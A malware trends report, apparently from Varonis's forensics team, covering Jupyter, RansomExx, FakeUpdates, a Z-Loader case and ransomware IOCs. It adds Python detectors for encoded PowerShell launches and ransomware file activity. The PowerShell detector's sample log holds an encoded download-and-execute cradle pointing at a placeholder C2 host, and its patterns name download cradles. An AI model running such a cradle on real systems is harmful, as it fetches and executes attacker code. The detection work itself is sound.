This Malware Trends Report – November 2020 is a monthly round-up from the Varonis Forensics Team documenting activity observed while responding to incidents, performing forensics, and reverse engineering malware samples. This report is intended to help you better understand the evolving threat landscape and adapt your defenses accordingly.
Jupyter is a Russian info-stealing malware that was first discovered in May 2020 but recently (November 2020) began to show signs of higher activity, particularly against U.S. victims.
Jupyter primarily targets data from Chromium-based browsers and bundles functionality spanning several stages of the attack chain: downloading additional malware, contacting a C2 server, and injecting its shellcode into hollowed, legitimate Windows processes.
Jupyter is extremely difficult to detect because of its small footprint: its payloads are stealthy and use no persistence or propagation techniques.
The stages of the malware are:
- The victim downloads a ZIP file that contains an installer of seemingly legitimate software from a malicious email attachment or link.
- Once installed, the malware injects its loader into the machine’s memory.
- This loader downloads the payload, an obfuscated PowerShell command that executes in memory and communicates with the C2 servers.
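The in-memory PowerShell stage above still leaves a trace at process-creation time even when nothing touches disk: the loader has to start powershell.exe with a command line, and that command line is typically base64-encoded (the -EncodedCommand switch takes the UTF-16LE script) and launched with a hidden window. The detector below is an added example, not code from the Varonis report or product. It runs over constructed process-creation log lines (the `user=`/`cmd=` field layout is an assumption), decodes any encoded command, and scores the visible plus decoded text against a small indicator set.

```python
import base64
import binascii
import re
from typing import Optional

# Matches the PowerShell encoded-command switch in its common spellings
# (-e, -ec, -enc, -EncodedCommand) followed by the base64 blob.
ENC_FLAG = re.compile(r"\s-e(?:c|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{8,})", re.I)

# Matches the PowerShell host itself, bare or with a full path.
PS_HOST = re.compile(r"(?:^|\\|\s)(?:pwsh|powershell)(?:\.exe)?\b", re.I)

# Indicators checked against the command line plus its decoded payload, if any.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "policy_bypass": re.compile(r"-e(?:p|x(?:ecutionpolicy)?)\s+bypass", re.I),
    "download_cradle": re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest", re.I),
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "nested_base64": re.compile(r"frombase64string", re.I),
}

# Constructed log format for this example: "<timestamp> user=<account> cmd=<command line>".
LINE_RX = re.compile(r"^(?P<ts>\S+)\s+user=(?P<user>\S+)\s+cmd=(?P<cmd>.*)$")


def encode_ps(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob: str) -> Optional[str]:
    """Reverse encode_ps; returns None if the blob is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def analyze_command_line(cmd: str) -> dict:
    """Decode any encoded command and score the visible plus decoded text."""
    match = ENC_FLAG.search(cmd)
    decoded = decode_encoded_command(match.group(1)) if match else None
    text = cmd if decoded is None else cmd + "\n" + decoded
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    if decoded is not None:
        hits.append("encoded_command")
    return {
        "is_powershell": bool(PS_HOST.search(cmd)),
        "decoded": decoded,
        "indicators": sorted(hits),
        "score": len(hits),
    }


def scan_log(lines, threshold: int = 2) -> list:
    """Return the PowerShell launches whose indicator count reaches the threshold."""
    findings = []
    for line in lines:
        m = LINE_RX.match(line)
        if not m:
            continue
        result = analyze_command_line(m.group("cmd"))
        if result["is_powershell"] and result["score"] >= threshold:
            findings.append({"ts": m.group("ts"), "user": m.group("user"), **result})
    return findings


# Constructed sample: one benign launch, one hidden encoded download cradle
# (placeholder domain), and one scripted but unencoded launch.
STAGE2_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/stage2')"
SAMPLE_LOG = [
    r"2020-11-03T09:12:01 user=alice cmd=C:\Windows\System32\notepad.exe report.txt",
    "2020-11-03T09:14:22 user=bob cmd=powershell.exe -NoProfile -WindowStyle Hidden -enc " + encode_ps(STAGE2_CRADLE),
    r"2020-11-03T09:15:40 user=carol cmd=powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['user']} score={f['score']} indicators={f['indicators']}")
        print("  decoded:", f["decoded"])
```

Only bob's launch crosses the default threshold: the hidden window, suppressed profile, encoded command, download cradle and Invoke-Expression together score 5, while carol's -ExecutionPolicy Bypass alone scores 1. Scoring the decoded text rather than the raw command line is the point; an encoded blob hides every keyword a plain regex would look for.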
RansomExx ransomware, most likely derived from the Defray777 ransomware variant, has targeted several U.S.-based victims, such as Tyler Technologies, as well as the Japanese company Konica Minolta. The ransom note for Konica Minolta:
One of the unique features of RansomExx is the ability to encrypt Linux-based machines. Most ransomware variants focus on attacking Windows machines, but RansomExx can paralyze businesses no matter which operating systems they use and demand a higher ransom.
RansomExx includes cryptolocker-related directories on the victim’s machine, which gives us a clue as to the authors’ origin or intentions:
By observing the ransomware’s source, we can deduce that it uses block encryption, which is slower than a stream cipher. We can also see that it uses a mutex to lock and unlock the encryption process:
FakeUpdates is a campaign designed to mislead users into downloading supposed updates for Microsoft Teams. What they actually download is a backdoor that uses Cobalt Strike to spread malware inside companies’ networks.
Recently, this campaign has targeted the U.S. education sector because of its heavy reliance on tools like Microsoft Teams, which provides video conferencing and other functionality that supports remote learning.
To get users to download the fake updates, the attackers use ads on various search engines so that their link appears among the top results for a range of searches. Clicking the link downloads a payload that runs a PowerShell script, which is the backdoor. The link also downloads a legitimate copy of Microsoft Teams to allay suspicion.
An example of a malicious search result:
What the ad leads to:
Once the backdoor is active inside the organization’s network, it is used to spread malware, mostly ransomware variants such as DoppelPaymer and, more recently, WastedLocker.
The attackers have also begun to exploit the ZeroLogon vulnerability as part of the campaign. ZeroLogon (CVE-2020-1472) is rated critical and can allow an attacker to elevate their privileges on the domain.
Varonis’ threat detection products have several built-in threat models that can identify the malware variants mentioned during different stages of their activity:
- “Crypto activity detected”: detects the creation of ransom notes on a file server.
- “Immediate pattern detected: user actions resemble ransomware”: detects the encryption process of files on a file server without relying on known ransomware file names or extensions, enabling detection of new ransomware/data destroyer variants.
- “Abnormal behavior: an unusual amount of data was uploaded to external websites”: detects the upload of the collected data to a website that is not under the organization’s domain, by examining the amount of the information sent.
- “Potential phishing attack: Access to a risky site where the domain name includes unusual characters”: detects when a user accesses a website that may contain malware, based on unusual characters in the website’s URL.
- “Suspicious email: an email was received with a suspected malicious attachment”: detects when an email attachment might contain malicious code or link to a malicious website.
- “Potential malicious file download was detected”: detects the download of a potentially malicious file.
- “Potential malware infection: dropper identified”: detects the potential infection of the environment by a dropper malware, which can be used to download the next stages of malware.
- “Password-spraying attack to several admin accounts from a single device”: detects a brute-force attempt against users in the organization’s domain.
Success Story of the Month
One of Varonis’ customers, a mid-size U.S. financial company, had a breach involving Z-Loader malware.
They called on the Varonis Forensics Team to investigate a suspicious Excel file, determine whether it was malicious, and deliver a detailed report of its functionality.
The Forensics Team found a suspicious MS Office file attached to one of the phishing emails.
The Excel file contained a macro that executed when the file was opened, which raised the concern that this might be a malware-related attack.
The Forensics Team identified the following:
- The malware masked its main functionality by adding many unused commands to the cells of the spreadsheet.
- The Excel file was able to change values in the registry to allow the macro code to run from Office documents without the need for the user to approve them.
- Once the code is executed, it tries to communicate with a C2 server by sending requests (which contain identification of the infected device and request type) and receiving responses over HTTPS protocol in order to download the next phase of the attack.
- We know that Z-Loader victims are managed through a control panel that shows the number of victims (online or not), their architecture (32- or 64-bit), and their country. It also collects the process list from victim devices and can launch different tasks on them.
Our team helped the customer by:
- Providing indicators of compromise (IOCs) of the Z-Loader variant to be implemented across the organization’s security solutions.
- Reverse-engineering a sample of the malware and providing a full and comprehensive malware report, including explanations of all the malware’s capabilities and functionality.
- Using the Varonis web UI to investigate Varonis alerts together with the customer, to verify that nothing was missed.
- Correlating the known parts of the attack with the events shown in Varonis.
New Variants Analyzed in November
| Variant name | Popularity | Data-centric IOCs |
| --- | --- | --- |
| Dharma ransomware | 3 | Extension: .zimba |
| GlobeImposter | 3 | Ransom note: .CC4H |
| Jigsaw Ransomware | 3 | Extension: .v315 |
| Pethya | 3 | Extension: .pethya zaplat zasifrovano |
| STOP Ransomware | 3 | Extension: .vpsh |
| CONTI Ransomware | 2 | Extension: .ITTZN |
| LuckyDay Ransomware | 2 | Extension: .luckyday |
| VoidCrypt Ransomware | 2 | Extension: .hidden |
| WastedLocker Ransomware | 2 | Extension: .hard2decrypt |
| WastedLocker Ransomware | 2 | Extension: .3ncrypt3d |
| .V3JS Ransomware | 1 | Extension: .V3JS |
| Bondy Ransomware | 1 | Extension: .bondy |
| CCE Ransomware | 1 | Extension: .aieou |
| DCRTR Ransomware | 1 | Extension: .termit |
| Fusion Nefilim | 1 | Extension: .FUSION |
| Lalaland Ransomware | 1 | Extension: .lalaland |
| LockDown Ransomware | 1 | Extension: .sext |
| RegretLocker Ransomware | 1 | Extension: .mouse |
| RexCrypt Ransomware | 1 | Extension: .RexCrypt |
| SnapDragon Ransomware | 1 | Extension: .SNPDRGN |
| ThunderCrypt Ransomware | 1 | Extension: .sz40 |
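As an added example (not Varonis code), the following Python script turns the data-centric IOCs in the table into a simple lookup and, beside it, implements the behavioural idea behind the “Immediate pattern detected” and “Crypto activity detected” threat models listed earlier: a burst of extension-changing renames from one account is flagged without knowing the new extension, and ransom-note creation is flagged by the filename’s wording. The audit-event format, the ransom-note pattern and the thresholds are assumptions constructed for this example.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta
import re

# Extensions taken from the November table above (matched case-insensitively).
KNOWN_RANSOM_EXTENSIONS = {ext.lower() for ext in (
    ".zimba", ".v315", ".vpsh", ".ITTZN", ".luckyday", ".hidden",
    ".hard2decrypt", ".3ncrypt3d", ".V3JS", ".bondy", ".aieou", ".termit",
    ".FUSION", ".lalaland", ".sext", ".mouse", ".RexCrypt", ".SNPDRGN", ".sz40",
)}

# Assumed ransom-note naming: a "how/readme/info" word plus a "decrypt/recover/restore"
# word in a text-like file. Tune this to what your environment actually sees.
RANSOM_NOTE_RX = re.compile(
    r"^(?=.*(?:decrypt|recover|restore))(?=.*(?:how|readme|instruction|info)).*\.(?:txt|html|hta)$",
    re.I,
)

# Behavioural thresholds (assumptions for this example).
BURST_WINDOW = timedelta(seconds=60)
BURST_THRESHOLD = 5

# Constructed audit-event format: "<iso-time> <user> <create|write|rename> <path> [-> <newpath>]".
EVENT_RX = re.compile(
    r"^(?P<ts>\S+) (?P<user>\S+) (?P<op>create|write|rename) (?P<path>\S+)(?: -> (?P<new>\S+))?$"
)


def file_name(path: str) -> str:
    """Last path component for either slash style."""
    return re.split(r"[\\/]", path)[-1]


def extension(path: str) -> str:
    """Lower-cased final extension, or '' if the name has none."""
    name = file_name(path)
    return name[name.rfind("."):].lower() if "." in name[1:] else ""


def detect(events) -> list:
    """Run the three checks over audit events and return alerts in order."""
    alerts = []
    renames = defaultdict(deque)  # user -> timestamps of extension-changing renames
    for line in events:
        m = EVENT_RX.match(line)
        if not m:
            continue
        ts = datetime.fromisoformat(m["ts"])
        user, op, path, new = m["user"], m["op"], m["path"], m["new"]
        target = new or path
        ext = extension(target)

        # Check 1: a file created or renamed to an extension from this month's table.
        if op in ("create", "rename") and ext in KNOWN_RANSOM_EXTENSIONS:
            alerts.append({"user": user, "rule": "known_ransom_extension", "detail": f"{ext} on {target}"})

        # Check 2: a ransom note dropped on the share.
        if op == "create" and RANSOM_NOTE_RX.match(file_name(target)):
            alerts.append({"user": user, "rule": "ransom_note_created", "detail": file_name(target)})

        # Check 3: many extension-changing renames from one user inside the window,
        # which catches a new variant whose extension is not yet on any list.
        if op == "rename" and new and extension(path) != ext:
            window = renames[user]
            window.append(ts)
            while window and ts - window[0] > BURST_WINDOW:
                window.popleft()
            if len(window) >= BURST_THRESHOLD:
                alerts.append({"user": user, "rule": "rename_burst",
                               "detail": f"{len(window)} extension changes within {BURST_WINDOW.seconds}s"})
                window.clear()
    return alerts


# Constructed sample events: a known Dharma extension, a burst with an unknown
# extension followed by a note, and a benign rename that keeps its extension.
SAMPLE_EVENTS = [
    r"2020-11-16T10:00:00 alice write \\fs01\finance\q3.xlsx",
    r"2020-11-16T10:00:05 alice rename \\fs01\finance\q3.xlsx -> \\fs01\finance\q3.xlsx.zimba",
    r"2020-11-16T10:01:00 mallory rename \\fs01\hr\a.docx -> \\fs01\hr\a.docx.xyz1",
    r"2020-11-16T10:01:01 mallory rename \\fs01\hr\b.docx -> \\fs01\hr\b.docx.xyz1",
    r"2020-11-16T10:01:02 mallory rename \\fs01\hr\c.docx -> \\fs01\hr\c.docx.xyz1",
    r"2020-11-16T10:01:03 mallory rename \\fs01\hr\d.docx -> \\fs01\hr\d.docx.xyz1",
    r"2020-11-16T10:01:04 mallory rename \\fs01\hr\e.docx -> \\fs01\hr\e.docx.xyz1",
    r"2020-11-16T10:01:06 mallory create \\fs01\hr\HOW_TO_RECOVER_FILES.txt",
    r"2020-11-16T10:05:00 bob rename \\fs01\hr\report_draft.docx -> \\fs01\hr\report_final.docx",
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"{alert['user']:8} {alert['rule']:24} {alert['detail']}")
```

Running it yields three alerts: alice's rename to .zimba hits the table lookup, mallory's fifth rename to the unlisted .xyz1 trips the burst check, and the note file trips the naming check; bob's draft-to-final rename produces nothing because the extension did not change. The burst check is the one that generalises, which is why the threat model above is described as not relying on known names or extensions.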